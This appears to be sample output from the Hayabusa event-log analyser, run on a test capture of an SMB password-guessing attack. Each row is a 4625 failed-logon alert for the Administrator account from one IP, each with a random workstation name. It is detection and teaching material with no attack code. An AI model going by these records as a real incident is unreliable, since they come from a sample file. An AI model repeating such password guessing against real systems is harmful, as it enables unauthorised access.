2016-09-20 01:50:24.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pjdFfvCCfGXo7FUf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rzqGdWlGglLQx6Z4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3Rt80PMk70sVqbk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: okunzcEHnxUml4SG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qH0AY3DeIryuHSiN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.886 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DjqtxY5Fly4qAusS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PXHYu7wAqo7m6mZn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.990 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UaEM3boErBRrCbna : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.040 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7nSzwstH2imPjwah : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Z6NM0I4vRTXlLKu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jYhjN3f8KlFIEUKy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qWicYt2HXLDgc3kc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uz7yqqxdMrsM2L1g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wqKTguT2Z3OPCxGR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ywpwCM4u6nFSq9oS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.407 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k1t5ZBw3HOxux65e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.534 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MtLFQSltjjOjdl2c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.593 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AyFD3cjef0NUMZZ5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uDYECnF1YTKRKA3K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pfqxcIVpX9BbsPIM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mjL5hvyYesMfDISw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3bh8c5ohv55SAX26 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MflfcFDnGU3xUOmz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.859 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aX0wfTs5FzCdwGrR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.895 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9gdU6faDjEH5wW2X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 507PC8xD6l0TbhG3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VrWgYcf9EuXt4MHS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:26.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GvIGEw3fdX9cDzIV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:26.159 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9X1q0dT5irWa44Rz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:26.307 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZpgAkElSQjVo53z2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:26.410 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7nxUEwRMaiAhiIXv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:26.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vIoaysmFNfEerv8f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:26.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aHLhFgL0xfnrAIoF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:26.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YGK96B1hDPMK9YKh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:26.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yhDnNRDnAwctVtgQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:26.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8zzO7RKaBPpg549A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:26.859 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zDgDGO3IKiLoIQ5D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0aaYeBTUEudC3446 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I41H8U06uuGlMf9S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.170 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r6Eh55149gbuU2el : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ajzJabQi7CjosFQ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l9y7gyU9aJi6Fpm3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hbLiIVcBYlu5JkX2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bDfEfHk54J3lJI6m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WOpuMTECalyeObl7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nZQYU1dyQOqlNJDL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pc58gDT07WNH3mMz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhExnDfInKbEI6AO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.710 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qKKTTQ0ZT2Ye4TV9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LdBFYyftnH67Gyh5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eO6c2PDl7zVBGzPi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1ONnDOs16EnBkdFv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aTHHCX9EoKRY4zhR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.939 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f1jhH08oLzpONDpa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o2YK7zc7Ne9c8txA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.013 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 86CrOo9CFreIzSM5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0X9UEojEnc350xPc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9g3PO3jofnySl92G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TRndfQmPYuhV0Ri : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.204 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yyJOdaks4B1sKMDv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IB3OSmcFx5TUiiJX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lo3Ex40dkIeO53HF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AkzDG8QOM2cxbokF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.395 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YoMf36ZXJBLnYxtc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.436 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5izPIefHqDDWNDlu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z9o4f1XvvcVXBNwL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IjCR48ZJFyEhzrYI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mUV9i4O2gapcC01d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJzGAMQCvJBFOUPq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fyyu0x6I29R2J10Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.687 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8lCe1shqSs0xNwAJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ipZAMvm56d5mE9Fc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XX9N7jodTuEYBCSE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h5DBFGpzfJJ7gYV1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:28.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fQ3qTwcWkXJDuXDI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
